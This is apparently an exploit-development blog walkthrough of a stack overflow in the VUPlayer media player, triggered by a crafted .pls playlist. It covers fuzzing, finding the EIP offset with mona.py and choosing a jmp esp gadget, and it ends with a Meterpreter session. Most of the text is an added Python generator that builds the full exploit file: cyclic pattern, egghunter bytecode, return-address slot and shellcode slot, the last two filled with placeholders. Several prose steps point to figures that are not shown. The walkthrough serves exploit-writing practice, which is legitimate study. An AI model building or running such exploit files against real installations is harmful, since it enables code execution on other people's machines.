Lately I decided to perform another 'quick autopsy' of a bug found a few years ago in VUPlayer. Here we go...
We will start here:
During this research I used:
- Windows 7 (32bit)
- mona.py with ImmunityDebugger
I started by fuzzing .PLS files to check whether there are any other bugs related to PLS parsing.
I landed here:
Ok, so we will prepare a basic skeleton for our PoC:
After opening this file (vtest1.pls) in VUPlayer we should see the value 41414141 in the registers.
I tried to prepare new content for our PLS file using mona.py (!mona pc 2000), but with that pattern as the payload I wasn't able to crash the program again. So I decided to use another approach: I restarted the program in ImmunityDbg and opened our first sample file with it:
As you can see we landed at 0x0012eca4. Double-click on that address and scroll up to the beginning of our 'shellcode' (AAAA):
After a while you should see:
Now let's open calc.exe ("programmer's calc") and type in the value shown at the beginning of our shellcode (3f8 in my case). Next switch to DEC(imal values):
So 0x3f8 is 1016 in decimal: 1012 bytes of filler followed by the 4 A's that land in EIP. In other words, the saved return address sits 1012 bytes into our buffer. Let's try it. Rewriting our poc.py:
So far so good. Now we need a way to run the shellcode on the stack. I decided to use !mona again to find a suitable address (!mona jmp -r esp):
We will put that value as our 0xdeadbeef:
So far, so good. :) Next I used an egghunter (!mona egg) and shellcode created by msfvenom:
Now we should be ready to prepare a working PoC:
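The PoC generator below is an added example and not the script from the original post: it reproduces the steps above in one place, with the offset (1012 bytes of filler, then 4 bytes into EIP), the `!mona pc`-style cyclic pattern and the offset lookup that mona would have done for us, the standard 32-byte egghunter with the w00t tag (the same hunter `!mona egg` emits), and the final file layout. The return address stays at the page's 0xdeadbeef placeholder and the shellcode is a stand-in of INT3 breakpoints; both are assumptions to be replaced with the `!mona jmp -r esp` result and the msfvenom output. The bad-character list is also an assumption (a typical starting point for a text playlist format), to be confirmed with `!mona bytearray` / `!mona compare` on the target.

```python
#!/usr/bin/env python3
"""Constructed PoC generator for the VUPlayer .pls stack overflow walkthrough.

Added example: not the original post's poc.py. Addresses and shellcode are placeholders.
"""
import string
import struct

OFFSET = 1012                       # bytes of filler before the saved return address (0x3f8 - 4)
RET_ADDR = 0xDEADBEEF               # placeholder: replace with the address from !mona jmp -r esp
SHELLCODE = b"\xcc" * 4             # placeholder: replace with msfvenom output (INT3s for testing)
BAD_CHARS = b"\x00\x0a\x0d"         # assumption: bytes a text playlist parser will likely mangle

EGG = b"w00t"
# Skape's 32-byte NtAccessCheckAndAuditAlarm egghunter; this is what !mona egg -t w00t produces.
# It scans memory page by page for the tag repeated twice and jumps to whatever follows it.
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f"         # or dx, 0x0fff      ; next page
    b"\x42"                         # inc edx
    b"\x52"                         # push edx
    b"\x6a\x02"                     # push 0x2
    b"\x58"                         # pop eax            ; NtAccessCheckAndAuditAlarm
    b"\xcd\x2e"                     # int 0x2e
    b"\x3c\x05"                     # cmp al, 0x5        ; ACCESS_VIOLATION?
    b"\x5a"                         # pop edx
    b"\x74\xef"                     # jz (back to next page)
    b"\xb8" + EGG +                 # mov eax, "w00t"
    b"\x8b\xfa"                     # mov edi, edx
    b"\xaf"                         # scasd
    b"\x75\xea"                     # jnz (back to inc edx)
    b"\xaf"                         # scasd
    b"\x75\xe7"                     # jnz
    b"\xff\xe7"                     # jmp edi            ; land on the shellcode after the tags
)


def pattern_create(length):
    """Metasploit/mona cyclic pattern (Aa0Aa1Aa2...), the same scheme as !mona pc <length>."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])      # longest unique pattern is 26*26*10*3 = 20280 bytes


def pattern_offset(pattern, eip_value):
    """Offset of the 4 pattern bytes that ended up in EIP.

    eip_value is the integer read in the debugger; x86 is little-endian, so pack it that way.
    Returns -1 if the value does not come from the pattern (e.g. partial overwrite).
    """
    return pattern.find(struct.pack("<I", eip_value))


def find_bad_chars(data, bad=BAD_CHARS):
    """Return the set of forbidden bytes present in data (empty set means it is clean)."""
    return {b for b in data if b in bad}


def build_pls(ret_addr=RET_ADDR, shellcode=SHELLCODE, offset=OFFSET, nops=16):
    """Assemble the playlist: filler | EIP | NOP sled | egghunter | NOP pad | w00tw00t | shellcode.

    After the overwritten 'ret', ESP points just past the saved EIP slot, so a jmp esp
    gadget lands on the NOP sled and slides into the egghunter. The hunter then finds the
    doubled tag wherever the file content ended up in memory and jumps to the shellcode.
    """
    payload = b"A" * offset
    payload += struct.pack("<I", ret_addr)
    payload += b"\x90" * nops
    payload += EGGHUNTER
    payload += b"\x90" * nops
    payload += EGG * 2 + shellcode
    return payload


def main():
    # Step 1: the pattern you would feed to the player to read the EIP value back from the debugger
    pattern = pattern_create(2000)
    print("offset for EIP=0x68423768:", pattern_offset(pattern, 0x68423768))
    # Step 2: sanity-check the bytes that must survive the parser
    print("bad chars in hunter:", find_bad_chars(EGGHUNTER) or "none")
    # Step 3: write the PoC
    pls = build_pls()
    with open("vtest.pls", "wb") as fh:
        fh.write(pls)
    print("wrote vtest.pls,", len(pls), "bytes")


if __name__ == "__main__":
    main()
```

The `0x68423768` shown in `main` is the EIP value the cyclic pattern produces at offset 1012 (the bytes "h7Bh"), so the lookup confirms the offset we computed by hand from 0x3f8. Run the script, open vtest.pls in VUPlayer under ImmunityDbg, and with the placeholder shellcode you should stop at an INT3 right after the two w00t tags; only then swap in the real address and msfvenom payload.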
Waiting with Meterpreter:
And we're ready to go:
I must say it was a good idea to practice a bit with this case.
You can find more information about it here:
1. rafaveira3
2. corelan
3. shogunlab
4. fuzzysecurity
5. securitysift
See you next time.